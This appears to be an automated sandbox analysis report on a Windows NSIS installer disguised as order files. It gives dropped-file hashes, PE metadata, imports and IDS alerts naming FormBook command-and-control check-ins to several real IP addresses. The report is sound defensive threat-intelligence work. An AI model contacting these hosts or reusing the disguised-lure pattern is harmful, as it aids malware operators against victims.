SHA-512:	054C17E8AC2EDED927F24E77A81FBA74498C9F3ABD07F5E42D6F9E20A58D47D9C30FF1060CC8626DE93FDD5BBA2A0503FF61EC7F4F70858871C15E63DDC48A7F
Malicious:	false
Preview:	....E..........;................../..r.....5...............e......9...............................S............................................e..........................E..........................W.................................8....................j......3....................X............................Ql....T.................>g...'.............[...l...P.................................\|................................q.....................3........v......t....H............................................s.................................................................................................................................................f....................................................................(..................................................;..$..................................................................o.-.........................................................l................. ...............................................Q......................

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Klavier\bucrane.erh

Process:	C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
File Type:	data
Category:	dropped
Size (bytes):	186880
Entropy (8bit):	1.2601075629320995
Encrypted:	false
SSDEEP:	768:597pZQKUv2av3tuZ8qbY2vFhkyd8MBkwaKKKbwspvRxtm8dBct2pEW5x1dGkrKLB:Ve2aPPET8MOwaKGeR//1T9dO
MD5:	AA2CD52ABEA96B7E317691ADD713125D
SHA1:	B34046DE9D9A275896762FD53A2DFF2D382EAE56
SHA-256:	C6AD2DCC3B851E06A60FA705CBAA83AADBEC68B10E24CA667088E8153973A7B2
SHA-512:	AD454262C5804887A9596D5CFFCC64D86EB1ED92813A5A37F57D9FCCA21D9C2EF465E51F05879F65BABA7752252B9FEC6352CFB5F678B21D3412B6906EB07C26
Malicious:	false
Preview:	..N......................p..........................................%.............................................................V.............z.N........................i......................................................................................................,(^.............b..n.....&...........................S..................>...................C.................................~...........................K.......................................B.....*..........L.....................j..............!...........O................S................a....C......x...y................................@..............................$...........................................N.........................g.................R...................................@.....................F...........+............................S..........R..............................................g.........................................................................................................

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Klavier\freemanship.txt

Process:	C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
File Type:	ASCII text, with very long lines (304), with no line terminators
Category:	dropped
Size (bytes):	304
Entropy (8bit):	4.14301130689188
Encrypted:	false
SSDEEP:	6:3CUzIrGx4igCDYUuTjAtLGafWWl2iEOQkAtj/jLsTzOwJT4HCALn:3CCF4igCDYA5Ga+Wl2iEOTAJryO8MHCu
MD5:	EF6FDEDE5EA8DBEF391FEC35BE82A5FC
SHA1:	6C88262F78E8B11651EEB6534F09C65CD0A8F8BB
SHA-256:	37B39724FD3B7FE48E1D65DA1A69BF4DBF809F34C67BAC7C4DA13F93DA9BE856
SHA-512:	5FB53ADEADB7C464A13EEECE64ADD35F972425D55447FFB84A277689BA3F4D5861A43B2883CB0744F98F164F2802C567F9969F777B98CE4609D28A64ED1101FD
Malicious:	false
Preview:	skydestigens dilettanist defmrkers,drmmene sprometrets taklingens crokinole ligegladestes,ultraremuneration dkketallerkners uncustomed filoversigterne.atomize koncentrationsevnens arthropodal epilepsis vakuums stabelvis lnregulering,catv skrivemaskinebordenes skydningerne.solanin godkendelsens gasogene.

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Klavier\pressurization.pra

Process:	C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
File Type:	data
Category:	dropped
Size (bytes):	269664
Entropy (8bit):	1.2446463566225683
Encrypted:	false
SSDEEP:	768:3wSokH49c7ZKiDm+1Qer3C4XkGB3luG3fCHoEHKM/yP35tuIJ95oV31XfCp43UtM:55+1GbuKvP32IqV1fmPU0VicgRx
MD5:	084CDF1FE8920EACBC8DC0E839D9E5A7
SHA1:	5BB2E4E15941AC2AB4287A58F671B82DA5C9A384
SHA-256:	A6EB01651C833919FC27F9B7DD2B5C6D9F9DD8766BC7848679B5E664ECC6C8A7
SHA-512:	F856C41F540B7BD8233179CC752E63E4C88C1BBC38739B4FAF3DA09675B13FBC0219458AFE95D4C1DD481B35BB69DC9B66C2269C64B106DE3659A51CE9AE1B42
Malicious:	false
Preview:	...E.......c...............................0...............................................................c........................................n.......Y................................P..........................................................................................$........................................~.........................1...Z....................................m......................=.......................U............................................[....................................}.=..................-..........................................................t........................-....................m..............V...................................................................q............m.X..................................c....................................................................................'.........................T...R.............................................................^............\|................................

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\vride\restriktivitets.bnk

Process:	C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
File Type:	data
Category:	dropped
Size (bytes):	131403
Entropy (8bit):	1.2526174536345023
Encrypted:	false
SSDEEP:	768:GGj5fMy6uanycN+gN/qEN+bHeC6roJdAGpeBgXU9ZWNAnu/Fkutb:L3l0fDkwaPA
MD5:	9AD6681DD2B309E6ACE142096F9E2870
SHA1:	5E02434342A98589A29B7E389E88DD4C60F09A8A
SHA-256:	576D2CD521891CF9C598B3CA0DADB89BD36CDE96B3F86F1CD27BF4FFCCE863CB
SHA-512:	28CFECE5E00AAB59758864503F4A9058EEF2FDFC8B73204ABF1E3B41011FBE5D9EAC3595E2EFA0E3B740B82F285B7EC8E42EA5DD42C39E5EFF39735A9C051CBB
Malicious:	false
Preview:	.............................>...................a...............................................>...............................Z......2.....................................................................U.................................J.....................................................................A@...Y..C..................1{.......................................................(.....................................................^......................................................V...........5.............................d.................................................+....{............................N........?.......................c.........y.........................................U................................:...................Y..........................................O....................!.......D.................................................}.....................................................................................................".......

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\vride\tresindstyvendedeles.ord

Process:	C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
File Type:	data
Category:	dropped
Size (bytes):	407199
Entropy (8bit):	1.2437541055056829
Encrypted:	false
SSDEEP:	1536:Jm/FJf9qdyY/zMFRdfxHg2jUsscLrP6d2i2SJ:Itlw7zMFHx/jUqOd2SJ
MD5:	D2D56C0A1BC3F0AE364C30A638393597
SHA1:	B564662188D504D42B22E18A487BF35503B87AF5
SHA-256:	E88BB71C91C537060F76CD2EF8633B767BFD720EFD7AF6F8300BA6883249EACB
SHA-512:	2756334999CFEE833DAC050193745C85D50A3884FCB18220243C1A71086B51E6FF6EB165189BE7748AABB6098F9BD693EB25E539D2ADE56486FA95CB297FD023
Malicious:	false
Preview:	..........................................................=...O}.............C.......................................................................................b..........0.......................................................m...................................................................................................&........-.........D..........................................................%....."......................................................z.......)....................................x............................&..........................................4.....[......V.........................................................=.J..........................................................................................Q.............z........................................................."%F.zt.....................=...............................................A......Y....................f..................................O.......................#.............

C:\Users\user\AppData\Local\Temp\nsn2852.tmp\LangDLL.dll

Process:	C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	3.817430038996001
Encrypted:	false
SSDEEP:	48:S46+/sTKYKxbWsptIp5tCZ0iVEAWyMEv9v/ft2O2B8mWofjLl:z+uPbO5tCZBVEAWyMEFv2Cm9L
MD5:	549EE11198143574F4D9953198A09FE8
SHA1:	2E89BA5F30E1C1C4CE517F28EC1505294BB6C4C1
SHA-256:	131AA0DF90C08DCE2EECEE46CCE8759E9AFFF04BF15B7B0002C2A53AE5E92C36
SHA-512:	0FB4CEA4FD320381FE50C52D1C198261F0347D6DCEE857917169FCC3E2083ED4933BEFF708E81D816787195CCA050F3F5F9C5AC9CC7F781831B028EF5714BEC8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L....C.f...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsn2852.tmp\System.dll

Process:	C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.804946284177748
Encrypted:	false
SSDEEP:	192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
MD5:	192639861E3DC2DC5C08BB8F8C7260D5
SHA1:	58D30E460609E22FA0098BC27D928B689EF9AF78
SHA-256:	23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
SHA-512:	6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx, Detection: malicious, Browse Filename: AKgHw6grDP.exe, Detection: malicious, Browse Filename: AKgHw6grDP.exe, Detection: malicious, Browse Filename: PaymentAdvice_SWIFT _USD39060-AUG-7-070224-000214.scr.exe, Detection: malicious, Browse Filename: PaymentAdvice_SWIFT _USD39060-AUG-7-070224-000214.scr.exe, Detection: malicious, Browse Filename: RFQ-SMC-PO-5547-SUPPLY.com.exe, Detection: malicious, Browse Filename: RFQ-SMC-PO-5547-SUPPLY.com.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsn2852.tmp\UserInfo.dll

Process:	C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.3415738744933092
Encrypted:	false
SSDEEP:	48:qK5HC+J4apHT1wH8l9QcXygHg0ZShMmj3jk6TbGr7X:5QiRzuHOXTA0H6jk6nGr7X
MD5:	F8B6DD1F9620BE4EF2AD1E81FB6B79FA
SHA1:	F06C8C8650335BACE41C8DBE73307CBE4E61B3B1
SHA-256:	A921CC9CC4AF332BE96186D60D2539CB413DFA44CFD73E85687F9338505FF85E
SHA-512:	F15811088ECDE4CD0C038DB2C278B7214E41728E382B25C65C2EB491BC0379C075841398E8C99E8CCEBA8BE7E8342BC69D35836EBE9B12EBEBFF48D01D5FA61A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L....C.f...........!................~........ ...............................P............@.........................@"......l ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...h....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsn2852.tmp\nsDialogs.dll

Process:	C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.157714967617029
Encrypted:	false
SSDEEP:	96:ooEv02zUu56FcS817eTaXx85qHFcUcxSgB5PKtAtoniJninnt3DVEB3YMNqkzfFc:ooEvCu5e81785qHFcU0PuAw0uyyIFc
MD5:	B7D61F3F56ABF7B7FF0D4E7DA3AD783D
SHA1:	15AB5219C0E77FD9652BC62FF390B8E6846C8E3E
SHA-256:	89A82C4849C21DFE765052681E1FAD02D2D7B13C8B5075880C52423DCA72A912
SHA-512:	6467C0DE680FADB8078BDAA0D560D2B228F5A22D4D8358A1C7D564C6EBCEFACE5D377B870EAF8985FBEE727001DA569867554154D568E3B37F674096BBAFAFB8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L....C.f...........!.........0......g........0............................................@..........................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..~............"..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsn2852.tmp\nsExec.dll

Process:	C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7168
Entropy (8bit):	5.295306975422517
Encrypted:	false
SSDEEP:	96:JgzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuHIDQ:JDQHDb2vSuOc41ZfUNQZGdHA
MD5:	11092C1D3FBB449A60695C44F9F3D183
SHA1:	B89D614755F2E943DF4D510D87A7FC1A3BCF5A33
SHA-256:	2CD3A2D4053954DB1196E2526545C36DFC138C6DE9B81F6264632F3132843C77
SHA-512:	C182E0A1F0044B67B4B9FB66CEF9C4955629F6811D98BBFFA99225B03C43C33B1E85CACABB39F2C45EAD81CD85E98B201D5F9DA4EE0038423B1AD947270C134A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.310543946591385
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	IMG_00991ORDER_FILES.exe
File size:	742'766 bytes
MD5:	3e9713868f8c85ac3aea7fa6c1ae4387
SHA1:	8c2862d76937d712b4d8cb7c891d23eda0af7abf
SHA256:	0645a7ba3f25c2f398a13f9d0d6701e9d3602044f3045f1ca1d598e08e4cde82
SHA512:	b575adb99ed53bfc389b64f1a2dbb81a7ac2f1f391c2be514fb5a56d0aee5d249beca1b5b933bc95b6e32329a40625c846d1145348fab1d33c09dfeee7b7ea1b
SSDEEP:	12288:JGPWHXq5rMTaQgsv89N42v3JanklTQGMi7B1mSwIhCjVn:JGu65Kdv89e2voKTQWB1mSlCjV
TLSH:	42F49CD1E48B901DD9F826FA0634A73ECF9B5C3438E85AED2FD736BB9AB2511214C405
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..O@../O...@...c...@..+F...@..Rich.@..........................PE..L....C.f.................h....:....

File Icon


Icon Hash:	4dd2d8e4e4f892cc

Static PE Info

General

Entrypoint:	0x40352f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x660843EA [Sat Mar 30 16:55:06 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f4639a0b3116c2cfc71144b88a929cfd

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A4h]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007F6120C9775Ah
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007F6120C97728h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [007A8318h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3d7000	0x291e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x66d1	0x6800	1cb1571d2754df0a2b7df66b1b8d9089	False	0.6727388822115384	data	6.4708065613184305	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1358	0x1400	f0b500ff912dda10f31f36da3efc8a1e	False	0.44296875	data	5.102094016108248	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39e378	0x600	92e7d2d711bd61815cb4cc2d30d795b1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a9000	0x2e000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3d7000	0x291e8	0x29200	cc706edee509d9ecaeb9366e623c5894	False	0.0645243636018237	data	2.7972076937156523	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3d73b8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.021042825032532828
RT_ICON	0x3e7be0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.037576203489594284
RT_ICON	0x3f1088	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.05318853974121996
RT_ICON	0x3f6510	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.04127302786962683
RT_ICON	0x3fa738	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.08018672199170125
RT_ICON	0x3fcce0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.09709193245778612
RT_ICON	0x3fdd88	0xd29	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9076877411694865
RT_ICON	0x3feab8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.18442622950819673
RT_ICON	0x3ff440	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.225177304964539
RT_DIALOG	0x3ff8a8	0xb8	data	English	United States	0.6467391304347826
RT_DIALOG	0x3ff960	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x3ffaa8	0x100	data	English	United States	0.5234375
RT_DIALOG	0x3ffba8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x3ffcc8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3ffd28	0x84	data	English	United States	0.7348484848484849
RT_VERSION	0x3ffdb0	0x1a8	data	English	United States	0.5660377358490566
RT_MANIFEST	0x3fff58	0x290	XML 1.0 document, ASCII text, with very long lines (656), with no line terminators	English	United States	0.5625

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-27T17:49:38.600561+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49849	80	192.168.11.20	199.59.243.226
2024-08-27T17:47:24.671410+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49818	80	192.168.11.20	38.47.207.120
2024-08-27T17:49:25.365375+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49845	80	192.168.11.20	3.33.130.190
2024-08-27T17:47:12.797775+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49815	80	192.168.11.20	203.161.42.73
2024-08-27T17:47:12.797775+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49815	80	192.168.11.20	203.161.42.73
2024-08-27T17:48:03.892087+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49827	80	192.168.11.20	35.244.245.121
2024-08-27T17:48:03.892087+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49827	80	192.168.11.20	35.244.245.121
2024-08-27T17:47:41.623663+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49820	80	192.168.11.20	194.58.112.174
2024-08-27T17:47:49.912809+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49823	80	192.168.11.20	194.58.112.174
2024-08-27T17:47:49.912809+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49823	80	192.168.11.20	194.58.112.174
2024-08-27T17:49:22.720571+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49844	80	192.168.11.20	3.33.130.190
2024-08-27T17:51:18.155260+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49873	80	192.168.11.20	35.244.245.121
2024-08-27T17:49:43.875794+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49851	80	192.168.11.20	199.59.243.226
2024-08-27T17:49:43.875794+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49851	80	192.168.11.20	199.59.243.226
2024-08-27T17:47:18.966070+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49816	80	192.168.11.20	38.47.207.120
2024-08-27T17:46:51.220148+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49808	80	192.168.11.20	76.223.67.189
2024-08-27T17:51:15.514252+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49872	80	192.168.11.20	35.244.245.121
2024-08-27T17:48:31.702585+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49832	80	192.168.11.20	3.82.56.39
2024-08-27T17:48:48.385538+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49837	80	192.168.11.20	172.96.191.39
2024-08-27T17:50:47.261723+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49867	80	192.168.11.20	38.47.207.120
2024-08-27T17:50:47.261723+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49867	80	192.168.11.20	38.47.207.120
2024-08-27T17:51:00.948919+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49868	80	192.168.11.20	194.58.112.174
2024-08-27T17:50:11.511466+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49856	80	192.168.11.20	76.223.67.189
2024-08-27T17:49:04.751068+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49841	80	192.168.11.20	148.135.49.178
2024-08-27T17:48:51.261825+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49838	80	192.168.11.20	172.96.191.39
2024-08-27T17:51:06.465760+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49870	80	192.168.11.20	194.58.112.174
2024-08-27T17:50:24.823365+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49860	80	192.168.11.20	203.161.42.73
2024-08-27T17:49:35.962800+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49848	80	192.168.11.20	199.59.243.226
2024-08-27T17:48:01.183325+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49826	80	192.168.11.20	35.244.245.121
2024-08-27T17:48:39.624597+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49835	80	192.168.11.20	3.82.56.39
2024-08-27T17:48:39.624597+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	49835	80	192.168.11.20	3.82.56.39
